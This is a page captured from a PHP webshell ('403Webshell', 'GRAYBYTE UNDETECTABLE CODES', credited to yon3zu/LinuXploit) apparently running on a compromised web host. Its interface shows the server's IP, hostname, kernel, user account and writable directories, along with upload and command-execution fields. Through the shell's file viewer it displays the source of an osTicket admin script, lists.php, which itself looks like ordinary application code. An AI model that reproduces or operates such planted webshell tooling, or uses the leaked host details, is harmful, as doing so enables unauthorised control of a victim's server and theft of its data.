- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.137.185.202
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/www/mesa/scp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/www/mesa/scp/lists.php
<?php
require('admin.inc.php');
require_once(INCLUDE_DIR.'class.list.php');


$list=null;
$criteria=array();
$redirect = false;
if ($_REQUEST['id'])
    $criteria['id'] = $_REQUEST['id'];
elseif ($_REQUEST['type'])
    $criteria['type'] = $_REQUEST['type'];

if ($criteria) {
    $list = DynamicList::lookup($criteria);
    if ($list)
        $list = CustomListHandler::forList($list);
    if ($list)
         $form = $list->getForm();
    else
        $errors['err']=sprintf(__('%s: Unknown or invalid ID.'),
            __('custom list'));
}

$errors = array();

if($_POST) {
    $info=Format::htmlchars($_POST, true);
    switch(strtolower($_REQUEST['do'])) {
        case 'update':
            if (!$list)
                $errors['err']=sprintf(__('%s: Unknown or invalid ID.'),
                    __('custom list'));
            elseif ($list->update($info, $errors)) {
                // Update item sorting
                if ($list->getSortMode() == 'SortCol') {
                    foreach ($list->getAllItems() as $item) {
                        $id = $item->getId();
                        if (isset($info["sort-{$id}"])) {
                            $item->sort = $info["sort-$id"];
                            $item->save();
                        }
                    }
                }

                // Update properties
                if (!$errors && ($form = $list->getForm())) {
                    $names = array();
                    $fields = $form->getDynamicFields();
                    foreach ($fields as $field) {
                        $id = $field->get('id');
                        if ($info["delete-prop-$id"] == 'on' && $field->isDeletable()) {
                            $fields->remove($field);
                            // Don't bother updating the field
                            continue;
                        }
                        if (isset($info["type-$id"]) && $field->isChangeable())
                            $field->set('type', $info["type-$id"]);
                        if (isset($info["name-$id"]) && !$field->isNameForced())
                            $field->set('name', $info["name-$id"]);

                        foreach (array('sort','label') as $f) {
                            if (isset($info["prop-$f-$id"])) {
                                $field->set($f, $info["prop-$f-$id"]);
                            }
                        }
                        if (in_array($field->get('name'), $names))
                            $field->addError(__('Field variable name is not unique'), 'name');
                        if (preg_match('/[.{}\'"`; ]/u', $field->get('name')))
                            $field->addError(__('Invalid character in variable name. Please use letters and numbers only.'), 'name');
                        if ($field->get('name'))
                            $names[] = $field->get('name');
                        if ($field->isValid())
                            $field->save();
                        else
                            # notrans (not shown)
                            $errors["field-$id"] = 'Field has validation errors';
                        // Keep track of the last sort number
                        $max_sort = max($max_sort, $field->get('sort'));
                    }
                }

                if ($errors)
                    $errors['err'] = sprintf('%s %s',
                        sprintf(__('Unable to update %s.'), __('custom list items')),
                        __('Correct any errors below and try again.'));
                else {
                    $list->_items = null;
                    $msg = sprintf(__('Successfully updated %s.'),
                        __('this custom list'));
                }

            } elseif ($errors)
                $errors['err'] = $errors['err'] ?: sprintf('%s %s',
                    sprintf(__('Unable to update %s.'), __('this custom list')),
                    __('Correct any errors below and try again.'));
            else
                $errors['err']=sprintf(__('Unable to update %s.'), __('this custom list'))
                    .' '.__('Internal error occurred');

            break;
        case 'add':
            if ($list=DynamicList::add($info, $errors)) {
                 $form = $list->getForm(true);
                 Messages::success(sprintf(__('Successfully added %s.'), __('this custom list')));
                 $type = array('type' => 'created');
                 Signal::send('object.created', $list, $type);
                 // Redirect to list page
                 $redirect = "lists.php?id={$list->id}#items";
            } elseif ($errors) {
                $errors['err']=sprintf('%s %s',
                    sprintf(__('Unable to add %s.'), __('this custom list')),
                    __('Correct any errors below and try again.'));
            } else {
                $errors['err']=sprintf(__('Unable to add %s.'), __('this custom list'))
                    .' '.__('Internal error occurred');
            }
            break;

        case 'mass_process':
            if(!$info['ids'] || !is_array($info['ids']) || !count($info['ids'])) {
                $errors['err'] = sprintf(__('You must select at least %s.'),
                    __('one custom list'));
            } else {
                $count = count($info['ids']);
                switch(strtolower($info['a'])) {
                    case 'delete':
                        $i=0;
                        foreach($info['ids'] as $k=>$v) {
                            if(($t=DynamicList::lookup($v)) && $t->delete())
                                $i++;
                        }
                        if ($i && $i==$count)
                            $msg = sprintf(__('Successfully deleted %s.'),
                                _N('selected custom list', 'selected custom lists', $count));
                        elseif ($i > 0)
                            $warn = sprintf(__('%1$d of %2$d %3$s deleted'), $i, $count,
                                _N('selected custom list', 'selected custom lists', $count));
                        elseif (!$errors['err'])
                            $errors['err'] = sprintf(__('Unable to delete %s. They may be in use.'),
                                _N('selected custom list', 'selected custom lists', $count));
                        break;
                }
            }
            break;

        case 'import-items':
            if (!$list) {
                $errors['err']=sprintf(__('%s: Unknown or invalid ID.'),
                    __('custom list'));
            }
            else {
                $status = $list->importFromPost($_FILES['import'] ?: $info['pasted']);
                if (is_numeric($status))
                    $msg = sprintf(__('Successfully imported %1$d %2$s'), $status,
                        _N('list item', 'list items', $status));
                else
                    $errors['err'] = $status;
            }
            break;
    }

    if ($form) {
        for ($i=0; isset($info["prop-sort-new-$i"]); $i++) {
            if (!$info["prop-label-new-$i"])
                continue;
            $field = DynamicFormField::create(array(
                'sort' => $info["prop-sort-new-$i"] ?: ++$max_sort,
                'label' => $info["prop-label-new-$i"],
                'type' => $info["type-new-$i"],
                'name' => $info["name-new-$i"],
                'flags' => DynamicFormField::FLAG_ENABLED
                    | DynamicFormField::FLAG_AGENT_VIEW
                    | DynamicFormField::FLAG_AGENT_EDIT,
            ));
            if ($field->isValid()) {
                $form->fields->add($field);
                $field->save();
            }
            else
                $errors["new-$i"] = $field->errors();
        }
    }
}

if ($redirect)
    Http::redirect($redirect);

$page='dynamic-lists.inc.php';
if($list && !strcasecmp(@$_REQUEST['a'],'items') && isset($_SERVER['HTTP_X_PJAX'])) {
    $page='templates/list-items.tmpl.php';
    $pjax_container = @$_SERVER['HTTP_X_PJAX_CONTAINER'];
    require(STAFFINC_DIR.$page);
    // Don't emit the header
    return;
}
if($list || ($_REQUEST['a'] && !strcasecmp($_REQUEST['a'],'add'))) {
    $page='dynamic-list.inc.php';
    $ost->addExtraHeader('<meta name="tip-namespace" content="manage.custom_list" />',
        "$('#content').data('tipNamespace', 'manage.custom_list');");
}

$nav->setTabActive('manage');
require(STAFFINC_DIR.'header.inc.php');
require(STAFFINC_DIR.$page);
include(STAFFINC_DIR.'footer.inc.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit